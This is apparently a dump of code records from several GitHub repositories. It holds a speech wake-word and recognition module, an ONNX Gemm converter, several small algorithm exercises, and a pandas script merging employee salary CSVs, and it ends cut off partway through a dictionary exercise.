detected_number = 0\n            for kws_times in range(kws_wakeup_times):\n                if kws_score_np[kws_idx + kws_times][-1] > self.cfg.general.kws_detection_threshold:\n                    detected_number += 1\n\n            if detected_number >= kws_wakeup_times * self.cfg.general.kws_detection_number_threshold:\n                bool_find_kws = True\n\n        if bool_find_kws:\n            self.params_dict['kws_container_np'] = np.zeros(np.array(kws_score_list).shape)\n        else:\n            # keep a window of kws results for the next sliding-window pass\n            self.params_dict['kws_container_np'] = np.array(kws_score_list)\n\n        return bool_find_kws\n\n    def run_asr(self, contorl_kws_bool=True):\n        if not self.bool_do_asr:\n            return ('',[])\n\n        asr_tuple = self.run_asr_normal(contorl_kws_bool)\n        user_string=asr_tuple[0]\n        asr_string=asr_tuple[1]\n        if len(asr_string):\n            asr_string = self.asr_duplicate_check(asr_string)\n        return (user_string,asr_string)\n\n    def run_asr_normal(self, contorl_kws_bool=True):\n        canbin_mode=True\n        result_tuple=('',[])\n        if not self.bool_do_asr:\n            return result_tuple\n\n        # fetch the features\n        feature_data_asr = self.params_dict['feature_data_container_np'][-self.cfg.general.asr_feature_time:, :].astype(np.float32)\n        \n        # model forward pass\n        if self.cfg.model.bool_caffe:\n            net_output = model.caffe_model_forward(self.asr_net,\n                                                   feature_data_asr,\n                                                   self.cfg.model.asr_net_input_name,\n                                                   self.cfg.model.asr_net_output_name)\n            net_output = np.squeeze(net_output)\n            net_output = net_output.T\n        elif self.cfg.model.bool_pytorch:\n            net_output = model.pytorch_model_forward(self.asr_net,\n                                                     feature_data_asr,\n                                                     self.bool_gpu)\n            net_output = np.squeeze(net_output)\n\n        # decode\n        if self.cfg.general.decode_id == 0:\n            
self.asr_decoder.ctc_decoder(net_output)\n        elif self.cfg.general.decode_id == 1:\n            self.asr_decoder.beamsearch_decoder(net_output, 5, 0, bswt=1.0, lmwt=0.3)\n        else:\n            raise Exception(\"[Unknow:] cfg.general.decode_id = {}\".format(self.cfg.general.decode_id))\n\n        if self.cfg.general.language_id == 0:\n            if(canbin_mode):\n                symbol_list = self.asr_decoder.output_symbol_list()\n                if(len(symbol_list)==0):\n                    return ('',[])\n                if(0):\n                    detect_token = primary_token_pass(symbol_list, self.graph)\n                    if not detect_token is None:\n                        result_tuple = Decode_Python.get_ouststr(detect_token)\n                        if('clamdown' in result_tuple[0] or 'hidden' in result_tuple[0]):\n                            return result_tuple\n                        else:\n                            return ('',[])\n                else:\n                    detect_token = self.graph.parse_command(symbol_list)\n                    if(len(detect_token.commands)==0 or (detect_token.commands[0].tpe!='F' and detect_token.commands[0].tpe!='H')):\n                        return ('',[])\n                    else:\n                        return (detect_token.symbols,detect_token.commands)\n            else:\n                self.asr_decoder.show_result_id()\n                self.asr_decoder.show_symbol()\n                # result_string = self.asr_decoder.output_symbol()\n                self.asr_decoder.match_keywords_chinese(self.cfg.general.kws_list, self.cfg.general.kws_dict)\n                result_string = self.asr_decoder.output_control_result_string(self.cfg.general.control_kws_list,\n                                                                              contorl_kws_bool)\n        elif self.cfg.general.language_id == 1:\n            pass\n        else:\n            raise Exception(\"[Unknow:] cfg.general.language_id = {}\".format(self.cfg.general.language_id))\n\n        return result_tuple\n\n    def run_asr_vad(self, audio_data):\n        asr_vad_max_activate_count=16\n        asr_vad_activate_threshold=10\n        asr_vad_deactivate_threshold=2\n        result_command=Command()\n        # init \n        result_tuple = ('',[])\n        self.params_dict['asr_vad_audio_data_container_np'][self.cfg.general.sample_rate * (int(self.cfg.general.asr_vad_audio_data_ms / 1000.0)- 1):] = audio_data\n\n        # enter asr vad mode\n        if not self.params_dict['asr_vad_flag']:\n            self.params_dict['asr_vad_flag'] = True\n\n        # state change\n        self.params_dict['asr_vad_flag_count'] += 1\n        print(\"[Information:] Go into run_asr_vad, asr_vad_flag_count: \", self.params_dict['asr_vad_flag_count'])\n\n        # loop over vad detection\n        audio_data_len = len(audio_data)\n        for i in range(0, audio_data_len - 480, 480):\n\n            # vad counting: tracks whether speech has ended at the current moment\n            vad_wav = audio_data[i: i + 480].astype(np.int16).tobytes()\n            if self.vad.is_speech(vad_wav, sample_rate=self.cfg.general.sample_rate):\n                self.params_dict['asr_vad_activate_count'] += 1\n            else:\n                self.params_dict['asr_vad_activate_count'] -= 1\n            self.params_dict['asr_vad_activate_count'] = max(0, min(self.params_dict['asr_vad_activate_count'], asr_vad_max_activate_count))\n\n            # establish the vad start position\n            if (self.params_dict['asr_vad_activate_count'] > asr_vad_activate_threshold and self.params_dict[\n                'asr_vad_activate_flag'] == False):\n                self.params_dict['asr_vad_activate_flag'] = True\n                self.params_dict['asr_vad_activate_pos_id'] = self.cfg.general.sample_rate * 5 + i - asr_vad_activate_threshold * 480\n\n            # establish the vad end position\n            if self.params_dict['asr_vad_activate_count'] < asr_vad_deactivate_threshold:\n\n                # check whether a start position has been established\n                if not self.params_dict['asr_vad_activate_flag'] == True:\n                    continue\n                \n                # Option 1: collect the audio and recompute the features\n                # # fetch the audio data\n                # wave = self.params_dict['asr_vad_audio_data_container_np'][\n                #     self.params_dict['asr_vad_activate_pos_id']: min(self.cfg.general.sample_rate * 5 + i + 960,\n                #                                                      self.cfg.general.sample_rate * 6)]\n\n                # # compute the effective audio length and check it against the detection minimum\n                # if len(wave) < int(self.cfg.general.sample_rate * self.cfg.general.asr_vad_minitime_threshold_s[self.params_dict['asr_vad_loop_times']]):\n                #     continue\n\n                # # recognition result\n                # 
print(\"[Information:] 正常检测到 vad 起止位置,识别返回结果\")\n # result_tuple = self.asr_vad_detecte(wave)\n\n # 方式二:直接从容器里抽取特征\n # 获取音频数据\n start_pos_id = self.params_dict['asr_vad_activate_pos_id']\n end_pos_id = min(self.cfg.general.sample_rate * 5 + i + 960, self.cfg.general.sample_rate * 6)\n wave_len = end_pos_id - start_pos_id\n\n # 计算有效音频长度,判断是否小于检测最短长度\n if wave_len < int(self.cfg.general.sample_rate * self.cfg.general.asr_vad_minitime_threshold_s[self.params_dict['asr_vad_loop_times']]):\n continue\n\n # 识别结果\n print(\"[Information:] 正常检测到 vad 起止位置,识别返回结果\")\n result_tuple = self.asr_vad_detecte_pos(start_pos_id, end_pos_id)\n\n if len(result_tuple[1]) != 0:\n self.params_dict['asr_vad_first_detect']=False\n # 清空\n self.asr_vad_state_reset(reset_vad_falg=False)\n return False, result_tuple\n else:\n # 状态变化\n result_command.tpe='W'\n self.params_dict['asr_vad_loop_times'] += 1\n if self.params_dict['asr_vad_first_detect']==False or self.params_dict['asr_vad_loop_times'] >= self.cfg.general.asr_vad_loop_threshold:\n # 清空\n self.asr_vad_state_reset()\n if(self.params_dict['asr_vad_first_detect']==False):\n result_command.cmd=self.cfg.general.string_end_safety\n return True, ('',[result_command])\n else:\n result_command.cmd=self.cfg.general.string_end_loop\n return True, ('',[result_command])\n else:\n self.params_dict['asr_vad_first_detect']=False\n self.asr_vad_state_reset(reset_vad_falg=False)\n result_command.cmd=self.cfg.general.string_warring\n return False, ('',[result_command])\n\n # 缓存,移位\n self.params_dict['asr_vad_audio_data_container_np'][:self.cfg.general.sample_rate * 5] = self.params_dict[\n 'asr_vad_audio_data_container_np'][\n -self.cfg.general.sample_rate * 5:]\n\n if self.params_dict['asr_vad_activate_pos_id'] > 0:\n self.params_dict['asr_vad_activate_pos_id'] = max(0, self.params_dict['asr_vad_activate_pos_id'] - self.cfg.general.sample_rate)\n\n # check:判断没有说话\n if (self.params_dict['asr_vad_flag_count'] >= self.cfg.general.asr_vad_silence_threshold_s\n and self.params_dict['asr_vad_activate_flag'] == False):\n print(\"[Information:] silence >= {},未检测到声音\".format(self.cfg.general.asr_vad_silence_threshold_s))\n # 清空\n self.asr_vad_state_reset()\n result_command.tpe='W'\n result_command.cmd=self.cfg.general.string_end_safety\n if(self.params_dict['asr_vad_first_detect']==False):\n return True, ('',[result_command])\n else:\n result_command.cmd=self.cfg.general.string_silence_warring\n return True, ('',[result_command])\n\n # check:判断超过时长\n if self.params_dict['asr_vad_flag_count'] >= self.cfg.general.asr_vad_overtime_threshold_s:\n print(\"[Information:] overtime >= {},超长时间检测\".format(self.cfg.general.asr_vad_overtime_threshold_s))\n\n # 方式一:收集音频,重新计算特征\n # # 音频数据\n # wave = self.params_dict['asr_vad_audio_data_container_np'][\n # self.params_dict['asr_vad_activate_pos_id']: ]\n\n # # 识别结果\n # result_tuple = self.asr_vad_detecte(wave)\n\n # 方式二:直接从容器里抽取特征\n # 获取音频数据\n start_pos_id = self.params_dict['asr_vad_activate_pos_id']\n end_pos_id = self.cfg.general.sample_rate\n\n # 识别结果\n print(\"[Information:] 正常检测到 vad 起止位置,识别返回结果\")\n result_tuple = self.asr_vad_detecte_pos(start_pos_id, end_pos_id)\n\n if len(result_tuple[1]) != 0:\n # 清空\n self.params_dict['asr_vad_first_detect']=False\n self.asr_vad_state_reset(reset_vad_falg=False)\n return False, result_tuple\n else:\n # 状态变化\n result_command.tpe='W'\n self.params_dict['asr_vad_loop_times'] += 1\n if self.params_dict['asr_vad_first_detect']==False or self.params_dict['asr_vad_loop_times'] >= 
self.cfg.general.asr_vad_loop_threshold:\n # 清空\n self.asr_vad_state_reset()\n if(self.params_dict['asr_vad_first_detect']==False):\n result_command.cmd=self.cfg.general.string_end_safety\n return True, ('',[result_command])\n else:\n result_command.cmd=self.cfg.general.string_end_loop\n return True, ('',[result_command])\n else:\n self.params_dict['asr_vad_first_detect']=False\n self.asr_vad_state_reset(reset_vad_falg=False)\n result_command.cmd=self.cfg.general.string_warring\n return False, ('',[result_command])\n\n # 返回,输出\n if self.params_dict['asr_vad_flag']:\n return False, result_tuple\n else:\n # 清空\n self.asr_vad_state_reset(reset_vad_falg=False)\n return False, result_tuple\n\n def asr_vad_detecte(self, wave):\n # init\n result = ('',[])\n\n # feature\n # 计算特征\n feature = Feature(self.cfg.general.sample_rate, int(self.cfg.general.feature_freq),\n int(self.cfg.general.nfilt))\n feature.get_mel_int_feature(wave)\n feature_data = feature.copy_mfsc_feature_int_to().astype(np.float32)\n\n # 模型前向传播\n if self.cfg.model.bool_caffe:\n net_output = model.caffe_model_forward(self.asr_net,\n feature_data,\n self.cfg.model.asr_net_input_name,\n self.cfg.model.asr_net_output_name)\n net_output = np.squeeze(net_output)\n net_output = net_output.T\n elif self.cfg.model.bool_pytorch:\n net_output = model.pytorch_model_forward(self.asr_net,\n feature_data,\n self.bool_gpu)\n net_output = np.squeeze(net_output)\n\n # decode\n if self.cfg.general.decode_id == 0:\n raise NotImplementedError\n elif self.cfg.general.decode_id == 1:\n net_output = torch.from_numpy(net_output)\n # symbol_list = self.asr_beamsearch.prefix_beam_search(net_output, lm=self.lm)\n symbol_list = self.asr_beamsearch.prefix_beam_search_contextbias(net_output, lm=self.lm, lm_weight=0.3)\n else:\n raise Exception(\"[Unknow:] cfg.general.decode_id = {}\".format(self.cfg.general.decode_id))\n\n if self.cfg.general.language_id == 0:\n #print('beamsearch result: ',symbol_list)\n if(0):\n detect_token = primary_token_pass(symbol_list, self.graph)\n result = Decode_Python.get_ouststr(detect_token)\n else:\n result = self.graph.parse_command(symbol_list)\n result = (result.symbols,result.commands)\n\n elif self.cfg.general.language_id == 1:\n raise NotImplementedError\n else:\n raise Exception(\"[Unknow:] cfg.general.language_id = {}\".format(self.cfg.general.language_id))\n\n return result\n\n def asr_vad_detecte_pos(self, start_pos_id, end_pos_id):\n # init\n result = ('',[])\n\n # feature\n # 获取特征\n start_pos_time = max(int(start_pos_id / self.cfg.general.sample_rate * 100), 0)\n end_pos_time = min(int(end_pos_id / self.cfg.general.sample_rate * 100), self.params_dict['feature_data_container_np'].shape[0])\n feature_data_asr = self.params_dict['feature_data_container_np'][start_pos_time : end_pos_time, :].astype(np.float32)\n\n # 模型前向传播\n if self.cfg.model.bool_caffe:\n net_output = model.caffe_model_forward(self.asr_net,\n feature_data_asr,\n self.cfg.model.asr_net_input_name,\n self.cfg.model.asr_net_output_name)\n net_output = np.squeeze(net_output)\n net_output = net_output.T\n elif self.cfg.model.bool_pytorch:\n net_output = model.pytorch_model_forward(self.asr_net,\n feature_data_asr,\n self.bool_gpu)\n net_output = np.squeeze(net_output)\n\n # decode\n if self.cfg.general.decode_id == 0:\n raise NotImplementedError\n elif self.cfg.general.decode_id == 1:\n net_output = torch.from_numpy(net_output)\n symbol_list = self.asr_beamsearch.prefix_beam_search(net_output, lm=self.lm)\n # symbol_list = 
self.asr_beamsearch.prefix_beam_search_contextbias(net_output, lm=self.lm, lm_weight=0.3)\n else:\n raise Exception(\"[Unknow:] cfg.general.decode_id = {}\".format(self.cfg.general.decode_id))\n\n if self.cfg.general.language_id == 0:\n #print('beamsearch result: ',symbol_list)\n if(0):\n detect_token = primary_token_pass(symbol_list, self.graph)\n result = Decode_Python.get_ouststr(detect_token)\n else:\n result = self.graph.parse_command(symbol_list)\n result = (result.symbols,result.commands)\n\n elif self.cfg.general.language_id == 1:\n raise NotImplementedError\n else:\n raise Exception(\"[Unknow:] cfg.general.language_id = {}\".format(self.cfg.general.language_id))\n\n return result\n\n def asr_vad_state_reset(self, reset_vad_falg = True):\n self.params_dict['asr_vad_audio_data_container_np'] = np.zeros(\n int(self.cfg.general.sample_rate * self.cfg.general.asr_vad_audio_data_ms / 1000.0))\n self.params_dict['asr_vad_activate_pos_id'] = 0\n self.params_dict['asr_vad_flag_count'] = 0\n self.params_dict['asr_vad_activate_flag'] = False\n if reset_vad_falg:\n self.params_dict['asr_vad_flag'] = False\n self.params_dict['asr_vad_loop_times'] = 0\n self.params_dict['asr_vad_first_detect']=True\n\n def asr_duplicate_update_counter(self):\n for key in self.params_dict['asr_duplicate_counter']:\n if self.params_dict['asr_duplicate_counter'][key] > 0:\n self.params_dict['asr_duplicate_counter'][key] = self.params_dict['asr_duplicate_counter'][\n key] - self.cfg.general.window_size_ms\n #print(key, self.params_dict['asr_duplicate_counter'][key])\n\n def asr_duplicate_check(self, asr_string):\n if(1):\n res_list=[]\n for idx in range(len(asr_string)):\n if 'Wakeup' in asr_string[idx].cmd:\n res_list.append(asr_string[idx])\n continue\n if asr_string[idx].cmd not in self.params_dict['asr_duplicate_counter']:\n self.params_dict['asr_duplicate_counter'][asr_string[idx].cmd] = self.cfg.general.total_time_ms\n res_list.append(asr_string[idx])\n else:\n if self.params_dict['asr_duplicate_counter'][asr_string[idx].cmd] > 0:\n continue\n else:\n self.params_dict['asr_duplicate_counter'][asr_string[idx].cmd] = self.cfg.general.total_time_ms\n res_list.append(asr_string[idx])\n return res_list\n else:\n res_string = \"\"\n tmp_string = asr_string.split(' ')\n for idx in range(len(tmp_string)):\n if '小锐小锐_唤醒' in tmp_string[idx]:\n res_string += tmp_string[idx] + \" \"\n continue\n if tmp_string[idx] not in self.params_dict['asr_duplicate_counter']:\n self.params_dict['asr_duplicate_counter'][tmp_string[idx]] = self.cfg.general.total_time_ms\n res_string += tmp_string[idx] + \" \"\n else:\n if self.params_dict['asr_duplicate_counter'][tmp_string[idx]] > 0:\n continue\n else:\n self.params_dict['asr_duplicate_counter'][tmp_string[idx]] = self.cfg.general.total_time_ms\n res_string += tmp_string[idx] + \" \"\n return res_string","repo_name":"ProLing1994/demo","sub_path":"Speech/API/Kws_weakup_Asr/RMAI_KWS_ASR_API_Canbin.py","file_name":"RMAI_KWS_ASR_API_Canbin.py","file_ext":"py","file_size_in_byte":37798,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"93"} +{"seq_id":"41722036912","text":"import stack\n\n\nclass Dijkstra:\n def __init__(self):\n self.values = stack.ArrayStack()\n self.operations = stack.ArrayStack()\n\n def calculate(self, expression: str):\n for char in expression:\n if char == ')':\n right_value = self.values.pop()\n left_value = self.values.pop()\n operation = self.operations.pop()\n if operation == '+':\n result = left_value + right_value\n 
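# the remaining operators below follow the same pattern: pop two operands, apply, push the result\n                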
elif operation == '-':\n                    result = left_value - right_value\n                elif operation == '*':\n                    result = left_value * right_value\n                elif operation == '/':\n                    result = left_value / right_value\n                self.values.push(result)\n            elif char in ['+', '-', '*', '/']:\n                self.operations.push(char)\n            elif self.try_parse_int(char):\n                self.values.push(int(char))\n            else:\n                continue\n        return self.values.pop()\n\n    def try_parse_int(self, char):\n        try:\n            int(char)\n            return True\n        except ValueError:\n            return False\n\n\nif __name__ == '__main__':\n    dijkstra = Dijkstra()\n    print(dijkstra.calculate('(1+((2+3)*(4*5)))'))\n","repo_name":"max-teren/algorithms","sub_path":"dijkstra.py","file_name":"dijkstra.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"10791814349","text":"#Nikola Petreski\n#M02 Lab\n#This program will ask you to enter your name and GPA, and inform you if you have made either the Honor Roll or the Dean's List.\n\ndef gpaReturn():\n\n    firstName = input(\"Please enter your first name: \")\n    gpaInput = float(input(\"Please enter your GPA: \"))\n    if (gpaInput>=3.5): \n        print(f\"Congratulations, {firstName}! You have made the Dean's List.\")\n    elif (3.5>gpaInput>=3.25):\n        print(f\"Congratulations, {firstName}! You have made the Honor Roll.\")\n    else: \n        print(f\"Sorry, {firstName}! You have not made the Dean's List or the Honor Roll.\")\n\ndef gpaFunction():\n    # Process students until the sentinel 'ZZZ' is entered; the original\n    # while/else construct called gpaReturn at most once and never looped.\n    while True:\n        lastName = input(\"Please enter your last name. If you would like to exit, please type 'ZZZ': \")\n        if lastName == 'ZZZ':\n            print('Thank You.')\n            break\n        gpaReturn()\n\ngpaFunction()\n","repo_name":"Tarnishing/m02Lab","sub_path":"m02LAB.py","file_name":"m02LAB.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"9478279281","text":"import pickle\nfrom sklearn.neighbors import KNeighborsClassifier\nimport math \n\nNearest = pickle.load(open('./model/Nearest.sav', 'rb'))\n\ndef slope(p1,p2):\n    dy=p1['y']-p2['y']\n    dx=p1['x']-p2['x']\n    return dy/dx\n\ndef dis(p1,p2):\n    dy=(p1['y']-p2['y'])**2\n    dx=(p1['x']-p2['x'])**2\n    return dy+dx\n    \ndef angle(m1,m2):\n    val=(m1-m2)/(1+(m1*m2))\n    if val<0:\n        val=val*(-1)\n    val=math.degrees(math.atan(val))\n    return val\n    \ndef render(l):\n    #dist=dis(l['1'],l['2'])\n    dist=dis(l['5'],l['6'])\n    print(dist)\n    #dis_lim=[15500,8000][l['7']]\n    #max_lim=[2500,2000][l['7']]\n    dis_lim=[140000,120000][l['7']]\n    max_lim=[50000,34000][l['7']]\n    alpha_lim=[0.1,0.07][l['7']]\n    beta_lim=[95,95][l['7']]\n    m0=slope(l['5'],l['6'])\n    m1=slope(l['5'],l['0'])\n    m2=slope(l['6'],l['0'])\n    alpha=slope(l['5'],l['6'])\n    if alpha <0:\n        alpha*=-1\n    gama1=angle(m1,m0)\n    gama2=angle(m2,m0)\n    beta=(180-gama1-gama2)\n    if dist>dis_lim:\n        return 2\n    # NOTE: the span between dist and alpha_lim was eaten during text extraction\n    # (it resembled an HTML tag); reconstructed as dist<max_lim and alpha>alpha_lim.\n    elif dist<max_lim and alpha>alpha_lim or beta>beta_lim:\n        return 1\n    else:\n        return 0\n","repo_name":"Garvit9000c/PosMate","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"93"} +{"seq_id":"22371479018","text":"# 22.09.29\n# Baekjoon / Problem 10026: Red-Green Color Blindness\n\ndef checkArea(visited, pos, isWeak):\n    stack = [pos]\n    visited[pos[1]][pos[0]] = True\n\n    while stack:\n        curPos = stack.pop()\n        for s in sameAreaCase:\n            nextX = curPos[0] + s[0]\n            nextY = curPos[1] + s[1]\n            if nextX < 0 or nextX >= N or nextY < 0 or nextY >= N:\n                continue\n\n            visitedValue = visited[nextY][nextX]\n\n            if not visitedValue:\n                curValue = 
board[curPos[1]][curPos[0]]\n nextValue = board[nextY][nextX]\n if isWeak:\n if (nextValue == curValue) or (\n curValue == 'R' and nextValue == 'G') or (\n curValue == 'G' and nextValue == 'R'):\n stack.append([nextX, nextY])\n visited[nextY][nextX] = True\n\n else:\n if nextValue == curValue:\n stack.append([nextX, nextY])\n visited[nextY][nextX] = True\n\n\nN = int(input())\nboard = []\nfor i in range(N):\n board.append(list(input()))\n\nweakVisited = [[False] * N for i in range(N)]\nnotWeakVisited = [[False] * N for i in range(N)]\n\nsameAreaCase = [[-1, 0], [1, 0], [0, -1], [0, 1]]\nnotWeakAns = 0\nweakAns = 0\n\nx = 0\ny = 0\nwhile x < N and y < N:\n while (y < N) and (weakVisited[y][x]):\n x += 1\n if x >= N:\n x = 0\n y += 1\n if y < N:\n weakAns += 1\n checkArea(weakVisited, [x, y], True)\n\nx = 0\ny = 0\nwhile x < N and y < N:\n while (y < N) and (notWeakVisited[y][x]):\n x += 1\n if x >= N:\n x = 0\n y += 1\n if y < N:\n notWeakAns += 1\n checkArea(notWeakVisited, [x, y], False)\n\nprint(notWeakAns, weakAns)\n","repo_name":"Sehbeom/CodingTest","sub_path":"BaekJoon/DFSBFS/220929_RGColorWeakness/RGColorWeakness.py","file_name":"RGColorWeakness.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"16714400951","text":"__all__ = ['OnnxGeneralLinear']\n\nimport torch\nimport torch.nn.functional as F\nfrom torch import nn\n\nfrom onnx2torch.node_converters.registry import add_converter\nfrom onnx2torch.onnx_graph import OnnxGraph\nfrom onnx2torch.onnx_node import OnnxNode\nfrom onnx2torch.utils.common import OnnxMapping\nfrom onnx2torch.utils.common import OnnxToTorchModule\nfrom onnx2torch.utils.common import OperationConverterResult\n\n\nclass OnnxGeneralLinear(nn.Linear, OnnxToTorchModule):\n \"\"\"General Linear layer with functionality of ONNX GEMM node.\n\n For additional info https://github.com/onnx/onnx/blob/master/docs/Operators.md#Gemm\n \"\"\"\n\n def __init__(\n self,\n in_features: int,\n out_features: int,\n bias: bool,\n trans_a: int,\n ):\n\n super().__init__(\n in_features=in_features,\n out_features=out_features,\n bias=bias,\n )\n # If != 0 transpose input before matmul\n self.trans_a = trans_a\n\n def forward(self, input_tensor: torch.Tensor) -> torch.Tensor: # pylint: disable=arguments-renamed\n input_tensor = torch.transpose(input_tensor, 0, 1) if self.trans_a != 0 else input_tensor\n return F.linear(input_tensor, self.weight, self.bias)\n\n @classmethod\n def maybe_create_simple_linear(\n cls,\n in_features: int,\n out_features: int,\n bias: bool,\n trans_a: int,\n ):\n if trans_a == 0:\n return nn.Linear(in_features=in_features, out_features=out_features, bias=bias)\n\n return OnnxGeneralLinear(in_features, out_features, bias, trans_a)\n\n\n@add_converter(operation_type='Gemm', version=9)\n@add_converter(operation_type='Gemm', version=11)\n@add_converter(operation_type='Gemm', version=13)\ndef _(node: OnnxNode, graph: OnnxGraph) -> OperationConverterResult:\n weights_value_name = node.input_values[1]\n weights = graph.initializers[weights_value_name]\n weights = weights.to_torch()\n\n # An empty string may be used in the place of an actual argument's name to indicate a missing argument.\n # See ONNX documentation\n if len(node.input_values) == 3 and node.input_values[2] != '':\n bias_value_name = node.input_values[2]\n bias = graph.initializers[bias_value_name]\n bias = bias.to_torch()\n else:\n bias = None\n\n node_attributes = node.attributes\n alpha = 
node_attributes.get('alpha', 1.0)\n    beta = node_attributes.get('beta', 1.0)\n    trans_a = node_attributes.get('transA', 0)\n    trans_b = node_attributes.get('transB', 0)\n\n    if trans_b == 0:\n        in_features, out_features = weights.shape[0], weights.shape[1]\n    else:\n        in_features, out_features = weights.shape[1], weights.shape[0]\n\n    torch_module = OnnxGeneralLinear.maybe_create_simple_linear(\n        in_features=in_features,\n        out_features=out_features,\n        bias=bias is not None,\n        trans_a=trans_a,\n    )\n\n    with torch.no_grad():\n        # In pytorch weights are transposed by default (see documentation)\n        # So we transpose weights before matmul if trans_b == 0\n        weights = torch.transpose(weights, 0, 1) if trans_b == 0 else weights\n        weights = weights * alpha\n        torch_module.weight.data = weights\n        if bias is not None:\n            bias = bias * beta\n            torch_module.bias.data = bias\n\n    return OperationConverterResult(\n        torch_module=torch_module,\n        onnx_mapping=OnnxMapping(\n            inputs=(node.input_values[0],),\n            outputs=node.output_values,\n        ),\n    )\n","repo_name":"cakeofwar42/onnx2torch","sub_path":"onnx2torch/node_converters/gemm.py","file_name":"gemm.py","file_ext":"py","file_size_in_byte":3588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"93"} +{"seq_id":"8664196585","text":"#**Problem:** Given the root node of a binary tree and an integer, print all paths in the tree whose node values sum to that integer.\r\n#A path is defined as the nodes passed through from the root straight down to a leaf. (Note: in the returned list, longer arrays come first.)\r\n#**Approach:** Recurse, accumulating the value over the left and right subtrees; when many parameters are needed, results can be collected through arguments passed into the function.\r\nclass TreeNode:\r\n    def __init__(self, x):\r\n        self.val = x\r\n        self.left = None\r\n        self.right = None\r\n\r\n\r\nclass method():\r\n    # Returns a 2D list; each inner list is one path that was found\r\n    def FindPath(self, root, expectNumber):\r\n        # write code here\r\n        if not root:\r\n            return []\r\n        ans=[]\r\n        path=[]\r\n        self.dfs(root,expectNumber,ans,path)\r\n        ans.sort()\r\n        return ans\r\n\r\n    def dfs(self,root,target,ans,path):\r\n        if not root:\r\n            return\r\n\r\n        path.append(root.val)\r\n        if root.left is None and root.right is None and target==root.val:\r\n            ans.append(path[:])\r\n\r\n        if root.left:\r\n            self.dfs(root.left,target-root.val,ans,path)\r\n        if root.right:\r\n            self.dfs(root.right,target-root.val,ans,path)\r\n\r\n        path.pop()\r\n#A cleaner approach is to make path shared state: dfs is then a pre-order traversal, and once a leaf has been visited\r\n#the last node is removed from path again, so values are appended while the recursion descends level by level\r\n#and popped one by one as it returns. Recursion itself thus takes care of restoring the path.","repo_name":"foxzyxu/offer","sub_path":"24.二叉树中和为某一值的路径.py","file_name":"24.二叉树中和为某一值的路径.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"93"} +{"seq_id":"18583991306","text":"\r\n#Using normal function or iteration\r\ndef recstar(no):\r\n    sum=0\r\n    while no != 0:  # loop over the digits (range(no) in the original iterated no times needlessly)\r\n        rem=no%10\r\n        sum=sum+rem\r\n        no= int(no/10)\r\n    print(sum)\r\nsumm=0\r\n#Using the recursion\r\ndef recustar(no):\r\n    if no!=0:\r\n        rem = no % 10\r\n        global summ\r\n        summ = summ + rem\r\n        recustar(int(no / 10))\r\n    return(summ)\r\n\r\ndef main():\r\n    no = int(input(\"Enter the number \"))\r\n    print(\"Using recursion method :\")\r\n    res=recustar(no)\r\n    print(res)\r\n    print(\"Using normal iteration method :\")\r\n    recstar(no)\r\n\r\nif __name__ == '__main__':\r\n    main()","repo_name":"sanketc029/python_assi5","sub_path":"Assi_5/Assi5_4.py","file_name":"Assi5_4.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"28081119536","text":"import requests\nimport pandas\n\nr = 
requests.get(\"https://raw.githubusercontent.com/lutydlitatova/python-jaro-2022/main/ukoly/data/zam_praha.csv\")\nopen(\"zam_praha.csv\", \"wb\").write(r.content)\n\nr = requests.get(\"https://raw.githubusercontent.com/lutydlitatova/python-jaro-2022/main/ukoly/data/zam_plzeň.csv\")\nopen(\"zam_plzeň.csv\", \"wb\").write(r.content)\n\nr = requests.get(\"https://raw.githubusercontent.com/lutydlitatova/python-jaro-2022/main/ukoly/data/zam_liberec.csv\")\nopen(\"zam_liberec.csv\", \"wb\").write(r.content)\n\nr = requests.get(\"https://raw.githubusercontent.com/lutydlitatova/python-jaro-2022/main/ukoly/data/platy_2021_02.csv\")\nopen(\"platy_2021_02.csv\", \"wb\").write(r.content)\n\nzam_praha=pandas.read_csv('zam_praha.csv')\nzam_plzen=pandas.read_csv('zam_plzeň.csv')\nzam_liberec=pandas.read_csv('zam_liberec.csv')\nplaty202102=pandas.read_csv('platy_2021_02.csv')\n\nzam_praha ['město']= 'Praha'\nzam_plzen ['město']= 'Plzeň'\nzam_liberec ['město']= 'Liberec'\n\nzamestnanci = pandas.concat([zam_praha,zam_plzen,zam_liberec], ignore_index=True)\n#print(zamestnanci.shape)\nzam202102= pandas.merge(zamestnanci, platy202102, on=['cislo_zamestnance'],how='left')\n#print(zam202102.shape)\n\nprumerPlat=zam202102.groupby('město')['plat'].mean()\njizNepracuji=zam202102[zam202102['plat'].isnull()]\njizNepracuji.to_csv('UkonceniZamestnanci.csv',index=False)\njizNepracujiPocet=jizNepracuji['cislo_zamestnance'].count()\nprint(jizNepracujiPocet)\n","repo_name":"EvaKolacek/python-kurz-2022","sub_path":"ukol-11.py","file_name":"ukol-11.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"93"} +{"seq_id":"11491876241","text":"# Practice writing functions and looping over dictionaries\n# Achieve a better understanding of how to traverse through a list of dictionaries or through a dictionary of lists\n# x = [[5, 2, 3], [10, 8, 9]]\n# students = [\n# {'first_name': 'Michael', 'last_name': 'Jordan'},\n# {'first_name': 'John', 'last_name': 'Rosales'}\n# ]\n# sports_directory = {\n# 'basketball': ['Kobe', 'Jordan', 'James', 'Curry'],\n# 'soccer': ['Messi', 'Ronaldo', 'Rooney']\n# }\n# z = [{'x': 10, 'y': 20}]\n\n\n# 1.Change the value 10 in x to 15. Once you're done, x should now be [ [5,2,3], [15,8,9] ].\n\n# x[1][0] = 15\n# print(x)\n\n# 2. 
